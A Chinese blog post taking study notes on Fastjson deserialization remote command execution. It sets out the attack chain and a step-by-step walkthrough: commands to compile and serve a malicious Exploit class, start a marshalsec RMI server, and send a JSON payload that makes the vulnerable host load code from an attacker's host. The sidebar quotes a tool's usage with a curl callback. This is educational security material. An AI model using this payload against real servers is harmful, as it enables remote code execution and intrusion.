随记(九):记录Fastjson远程命令执行流程

最新推荐文章于 2024-05-11 10:32:05 发布
最新推荐文章于 2024-05-11 10:32:05 发布
阅读量594 收藏 1
点赞数
分类专栏: 随记 文章标签: 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhanglichon666/article/details/110849165
版权

记录Fastjson远程命令执行流程


摘自:ZE0安全实验室的一篇分析文章 - 传送门

我觉得这个解释非常好,所以借此文记录下来。如有冒犯,私信我立即删除。同时还总结了漏洞利用流程的简述,像这个问题,在面试过程中也常常会被提及到,鄙人就有幸被提问过一次,模模糊糊的答出个大概来。

0x01 Fastjson远程命令执行流程

在这里插入图片描述
主机A:存在fastjson反序列化漏洞的主机
主机C:为RMI/LDAP服务
主机B:为构造的恶意类(包含要执行的命令)

1、攻击者使用payload攻击主机A(该payload需要指定rmi/ldap地址)

2、主机A引发反序列化漏洞,发送了进行rmi远程发放调用,去连接主机C

3、主机C的rmi服务指定加载主机B的恶意java类,所以主机A通过主机C的rmi服务最终加载并执行主机B的恶意java类

4、主机A引发恶意系统命令执行

0x02 Fastjson漏洞利用流程简述

1、先利用Python在本地启动一个HTTP服务,中间件随意,只要可以访问到我们的恶意JAVA类Exploit.class文件即可。

2、然后再从本地开启RMI服务,让RMI服务指定加载恶意JAVA类。

3、攻击者使用payload攻击目标主机(该payload需要指定RMI/LDAP地址)

/* 实战攻击流程 */
主机A: http://1.1.1.1:8090 (Fastjson漏洞主机)
主机B: http://2.2.2.2:8888 (恶意java类服务)
主机C: rmi://2.2.2.2:9999 (远程方法调用服务)

1.在本地使用javac命令编译Exploit.java文件,生成一个Exploit.class文件(Exploit文件名不能发生变化)
javac Exploit.java

2.然后再本地利用python启动一个http服务,中间件随意,但是需要能访问到Exploit.class文件。(这里使用python3临时启动一个HTTP服务)
python3 -m http.server --bind 0.0.0.0 8888

3.然后再从本地开启RMI服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://2.2.2.2:8888/#Exploit" 9999

4.接下来就可以发送payload

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://2.2.2.2:9999/Exploit",
        "autoCommit":true
    }
}

PS:此时主机A收到POST请求,触发反序列化漏洞,最终执行 Exploit.class 文件中的内容

Tips:纠正一个很多文章描述Fastjson漏洞利用的时候的一个错误,就是步骤三本地开启RMI服务时,利用marshalsec-0.0.3-SNAPSHOT-all.jar开启RMI服务,要让RMI服务指定加载恶意JAVA类,所以这里应该是 http://2.2.2.2:8888/#Exploit ,而不是许多文章中提及到的 http://1.1.1.1:8888/#Exploit 。

PS:因自己能力不足,上面的Tips我也不太确定是不是真的是师傅们笔误了,根据其分析的话,那里的文章描述应该是错误的,望知情人士指点一二。

XXR_Beta
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
FastJson远程命令执行漏洞学习笔
m0_73257876的博客
09-04 694
fastjson的漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔只做学习记录分享。如有错误,请大家批评指正!
fastjson远程命令执行
m0_52920608的博客
09-16 449
fastjson远程命令执行 vulhub复现
fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现
最新发布
qq_55202378的博客
05-11 829
如果用户勾选住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。时,需要进行 base64 编码绕过检测(不编码,执行不了,已经试过了~):勾选住密码选项后,点击登录,抓包,观察请求包中是否有。注意:这里java版本要用java8。,加一个环境变量,就可以用了~
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
Fastjson远程命令执行漏洞总结
weixin_52501704的博客
07-27 1013
将json字符串转化为json对象在net.sf.json中是这么做的//将json字符串转换为json对象在fastjson中是这么做的//将json字符串转换为json对象// Reference需要传入三个参数(className,factory,factoryLocation)// 第一个参数随意填写即可,第二个参数填写我们http服务下的类名,第三个参数填写我们的远程地址// ReferenceWrapper包裹Reference类,使其能够通过RMI进行远程访问。
:flex发送XML到servlet
03-01
标题“随:flex发送XML到servlet”指的是在Flex应用程序中向Java Servlet发送XML数据的过程,这通常涉及到客户端与服务器端的交互。Flex是一种基于Adobe AIR或Flash Player运行时的开发框架,常用于创建富互联网...
HL_Letter:个人随
05-02
【HL_Letter:个人随】是一个以Java技术为核心的个人学习笔项目,它可能是某位开发者记录自己在Java编程过程中的心得、技巧和问题解决方案的集合。从项目名称来看,"HL_Letter"可能代表了作者的名字或者某种缩写...
AJAX 随
10-29
在本篇随中,我们将探讨如何结构化地创建和使用一个基础的AJAX实现。 首先,我们需要创建一个AJAX对象。在不同的浏览器环境下,XMLHttpRequest对象的创建方式有所不同。在现代浏览器中,我们可以通过`new ...
统一响应结果和全局异常类
01-30
个人练习使用idea编写的项目后,总结的东西
互联网公司实习日参考.pdf
07-14
互联网公司实习日参考.pdf互联网公司实习日参考.pdf互联网公司实习日参考.pdf互联网公司实习日参考.pdf互联网公司实习日参考.pdf互联网公司实习日参考.pdf
fastjson 1.2.47 远程命令执行漏洞
weixin_42786460的博客
10-14 514
fastjson 1.2.47 远程命令执行漏洞
FastJSON 远程执行漏洞,速速升级!
Java技术栈,分享最主流的Java技术
07-20 3422
相信大家用 FastJSON 的人应该不少,居然有漏洞,还不知道的赶紧往下看,已经知道此漏洞的请略过……2019年6月22日,阿里云云盾应急响应中心监测到FastJSON...
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1695
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
fastjson远程代码执行漏洞问题分析
lucasma的博客
03-01 5218
背景 fastjson远程代码执行安全漏洞(以下简称RCE漏洞),最早是官方在2017年3月份发出的声明, security_update_20170315 没错,强如阿里这样的公司也会有漏洞。代码是人写的,有漏洞是难免的。关键是及时的修复。 声明中,官方指出: 最近发现fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞,为了保证系统安全,请升级到1.2.28/1.2.29...
Fastjson命令执行漏洞复现2(fastjson <=1.2.47)
szgyunyun的博客
06-29 927
一、搭建环境: https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce 提供的漏洞环境死活没复现出来只好自己搭建个环境了。 1、搭建tomcat环境 首先去tomcat官网下载tomcat https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.48/bin/apache-tomcat-9.0.48.tar.gz 2、将此压缩包复制到我的linux服务器上解压
复现Fastjson 1.2.47 远程命令执行漏洞
qq_54713392的博客
05-14 1194
复现Fastjson 1.2.47 远程命令执行漏洞 漏洞原理: Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 攻击机:window 10 IP地址192.168.32.1 靶机:ubantu 16.04 IP地址192.168.32.142 攻击步骤: (1)开启Fastjson
网络安全深入学习第七课——热门框架漏洞(RCE— Fastjson反序列化漏洞)
p36273的博客
09-18 1672
json全称是JavaScript object notation。即JavaScript对象标法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
洗牌发牌的C语言程序
06-06
以下是一个简单的随机洗牌发牌程序的C语言代码: ```c #include #include #include #define DECK_SIZE 52 #define SUIT_SIZE 13 int main() { int deck[DECK_SIZE]; int i, j, temp; // 初始化牌堆 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值